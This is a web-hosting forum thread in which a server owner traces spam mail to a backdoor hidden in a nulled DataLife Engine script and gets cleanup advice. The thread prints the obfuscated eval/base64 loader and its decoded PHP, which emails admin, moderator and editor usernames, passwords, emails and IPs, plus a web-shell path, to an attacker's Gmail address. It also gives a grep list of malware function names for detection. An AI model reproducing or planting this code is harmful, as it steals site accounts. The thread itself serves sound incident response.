ashutariyal
Active Member
Is there is any way in a linux server with whm to stop sending mails to a particular email id (from server's php script) or redirect it other email id.
Please help!
Please help!
Server Help!
- Thread starter ashutariyal
- Start date
- Status
11 comments
Sponge Bob
Active Member
Hello,
Please illustrate more. What exacrtly is it doing. Is there a script on the server sending out very many emails to one person or many? There must be a cronjob also setup or something.
Also what kind of emails are those being sent out?
Please illustrate more. What exacrtly is it doing. Is there a script on the server sending out very many emails to one person or many? There must be a cronjob also setup or something.
Also what kind of emails are those being sent out?
ashutariyal
Active Member
Thanks for your reply,
this is one kind of hacking and i have checked every script and found that it is "X-Mailer: DLE PHP" so i have replaced all files with new one but the script (which i still not found) still sending mails to a gmail email id in this formate
in every email only one account detail.
(which is killing my exim and server going overload)
Regards,
this is one kind of hacking and i have checked every script and found that it is "X-Mailer: DLE PHP" so i have replaced all files with new one but the script (which i still not found) still sending mails to a gmail email id in this formate
Code:
Acount: [ Editor | username | passowrd | email id | ip ] - Admin mail:
Hack Shell: http:// link of the script (which i already removed)in every email only one account detail.
(which is killing my exim and server going overload)
Regards,
Config Mail Manage
install this WHM plugin and you can limit each domains mails per hour and set config options per domain.
but you should secure/update your script to solve the problem :P
install this WHM plugin and you can limit each domains mails per hour and set config options per domain.
PHP:
cd /
wget http://www.configserver.com/free/cmm.tgz
tar -xzf cmm.tgz
cd cmm/
sh install.shbut you should secure/update your script to solve the problem :P
ashutariyal
Active Member
or is there is any way to find out this script on server / account
hacker's gmail id is : noreply.hak@gmail.com
hacker's gmail id is : noreply.hak@gmail.com
Sponge Bob
Active Member
Also check the cronjob must be active
Check this :
go to /etc/crontab
then do a ls
and see any cronjobs and delete them.
Thanks & Regards
Check this :
go to /etc/crontab
then do a ls
and see any cronjobs and delete them.
Thanks & Regards
search starting /
it will take a long time to search through all files on the server.
http://www.siteground.com/tutorials/ssh/ssh_searching.htm
it will take a long time to search through all files on the server.
http://www.siteground.com/tutorials/ssh/ssh_searching.htm
You can try doing a grep -RPn for some of the following they are very common vars of exploits
- passthru
- shell_exec
- system
- phpinfo
- base64_decode
- edoced_46esab (base64_decode used backwards to avoid detection by string searches like this)
- chmod
- mkdir
- `` (backticks with an operating system command between them)
- fopen
- fclose
- readfile
ashutariyal
Active Member
Thanks mate for your quick and fast support and help now i have figure out the script which is decoded with edoced_46esab. (it was in one of my file)
and after decoded with http://base64-encoder-online.waraxe.us/ i have get this
So this is my personal advise to all of my webmaster friends that never use any script from viethak . com
2nd thing if you use any nulled script then first check all files.
Thanks & Regards,
Code:
$oO0oO00Oo0Oo = strrev('edoced_46esab');
eval($oO0oO00Oo0Oo('LyotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSovDQoJCS8vIHRodWMgaGllbiBoYWsgLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQoJCQkJCQkNCgkgICAgICAgIGluY2x1ZGVfb25jZSBFTkdJTkVfRElSLicvZGF0YS9jb25maWcucGhwJzsNCgkJCWluY2x1ZGVfb25jZSBFTkdJTkVfRElSLicvY2xhc3Nlcy9tYWlsLmNsYXNzLnBocCc7DQoNCgkJCSRpZCA9ICRtZW1iZXJfaWRbJ3VzZXJfZ3JvdXAnXTsNCgkJCSRncm91cCA9ICJOaG9tIjsNCgkJCQ0KCQkJLy8gRHVhIGVtYWlsIGRhbmcgYWRtaW4gaGF5IHRoYW5oIHZpZW4gdHV5IHZhbyBjYXAgZG8NCgkJCXN3aXRjaCAoJGlkKSB7DQoJCQljYXNlIDE6DQoJCQkJJGdyb3VwID0gIiBBZG1pbmlzdHJhdG9yICI7DQoJCQkJYnJlYWs7DQoJCQljYXNlIDI6DQoJCQkJJGdyb3VwID0gIiBNb2RlcmF0b3IgIjsNCgkJCQlicmVhazsNCgkJCWNhc2UgMzoNCgkJCQkkZ3JvdXAgPSAiIEVkaXRvciAiOw0KCQkJCWJyZWFrOw0KCQkJZGVmYXVsdDoNCgkJCQkkZ3JvdXAgPSAiIE1lbWJlciAiOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQkJJGVtYWlsX3RpdGxlID0gIiBBY291bnQgIiAuIA0KCQkJCQkJCSRncm91cCAuIA0KCQkJCQkJCSIgb24gZG9tYWluICIgLiANCgkJCQkJCQkkY29uZmlnWydodHRwX2hvbWVfdXJsJ107DQoJCQkNCgkJCSRfZW1haWwgPSAkbWVtYmVyX2lkWydlbWFpbCddOw0KCQkJJGRhdGFfaGFrID0gICAnWyAnIC4gJGdyb3VwIC4NCgkJCQkJCSAgJyB8ICcgLiAkX25hbWUgLiANCgkJCQkJCSAgJyB8ICcgLiAkX3Bhc3MgLiANCgkJCQkJCSAgJyB8ICcgLiAkX2VtYWlsIC4gDQoJCQkJCQkgICcgfCAnIC4gJF9JUCAuIA0KCQkJCQkJICAnIF0gLSAnOw0KCQkJCQ0KCQkJJGVtYWlsX21zZyA9ICIgQWNvdW50OiAiIC4gJGRhdGFfaGFrOwkNCgkJCSRlbWFpbF90byA9IGJhc2U2NF9kZWNvZGUoImJtOXlaWEJzZVM1b1lXdEFaMjFoYVd3dVkyOXQiKTsNCgkJCSRtYWlsX2FkbWluID0gJGNvbmZpZ1snYWRtaW5fbWFpbCddOw0KCQkJJGVtYWlsX21zZyAuPSAiICAgIEFkbWluIG1haWw6ICIgLiAkbWFpbF9hZG1pbjsNCgkJCQ0KCQkJJGVtYWlsX21zZyAuPSAiIFxuIEhhY2sgU2hlbGw6ICIgLiANCgkJCSRjb25maWdbJ2h0dHBfaG9tZV91cmwnXSAuICJlbmdpbmUvZWRpdG9yL2pzY3JpcHRzL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9pbmRleC5waHAiOw0KCQkJaWYgKCRpZCA9PSAxIHx8ICRpZCA9PTIgfHwgJGlkID09IDMpew0KCQkJJG1haWxfb2JqID0gbmV3IGRsZV9tYWlsICgkY29uZmlnLCB0cnVlKTsNCgkJCQ0KCQkJJG1haWxfb2JqLT5zZW5kICgkZW1haWxfdG8sICRlbWFpbF90aXRsZSwgJGVtYWlsX21zZyk7DQoJCQkNCgkJCS8qZWNobyAiPHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCI+DQoJCQkJCWFsZXJ0KFwiQmFuIGRhIGRhbmcgbmhhcCAiLiAkZW1haWxfbXNnIA0KCQkJCQkJICAJCS4gIiB0aGFuaCBjb25nXCIpOw0KCQkJCTwvc2NyaXB0PiI7Ki8NCgkJCQkNCgkJCX0NCgkJCS8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQoJCS8qLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0qLw=='));
Code:
/*-----------------------------*/
// thuc hien hak /////////////////////////////////////////////
include_once ENGINE_DIR.'/data/config.php';
include_once ENGINE_DIR.'/classes/mail.class.php';
$id = $member_id['user_group'];
$group = "Nhom";
// Dua email dang admin hay thanh vien tuy vao cap do
switch ($id) {
case 1:
$group = " Administrator ";
break;
case 2:
$group = " Moderator ";
break;
case 3:
$group = " Editor ";
break;
default:
$group = " Member ";
break;
}
$email_title = " Acount " .
$group .
" on domain " .
$config['http_home_url'];
$_email = $member_id['email'];
$data_hak = '[ ' . $group .
' | ' . $_name .
' | ' . $_pass .
' | ' . $_email .
' | ' . $_IP .
' ] - ';
$email_msg = " Acount: " . $data_hak;
$email_to = base64_decode("bm9yZXBseS5oYWtAZ21haWwuY29t");
$mail_admin = $config['admin_mail'];
$email_msg .= " Admin mail: " . $mail_admin;
$email_msg .= " \n Hack Shell: " .
$config['http_home_url'] . "engine/editor/jscripts/tiny_mce/themes/advanced/index.php";
if ($id == 1 || $id ==2 || $id == 3){
$mail_obj = new dle_mail ($config, true);
$mail_obj->send ($email_to, $email_title, $email_msg);
/*echo "<script type=\"text/javascript\">
alert(\"Ban da dang nhap ". $email_msg
. " thanh cong\");
</script>";*/
}
/////////////////////////////////////////////////////////////////
/*-----------------------------*/2nd thing if you use any nulled script then first check all files.
Thanks & Regards,
I would check this file aswell
engine/editor/jscripts/tiny_mce/themes/advanced/index.php
a good way to check scripts is when you download them, check the last updated timestamp on the files, if a file was modified some time after the other files check it out
engine/editor/jscripts/tiny_mce/themes/advanced/index.php
a good way to check scripts is when you download them, check the last updated timestamp on the files, if a file was modified some time after the other files check it out
- Status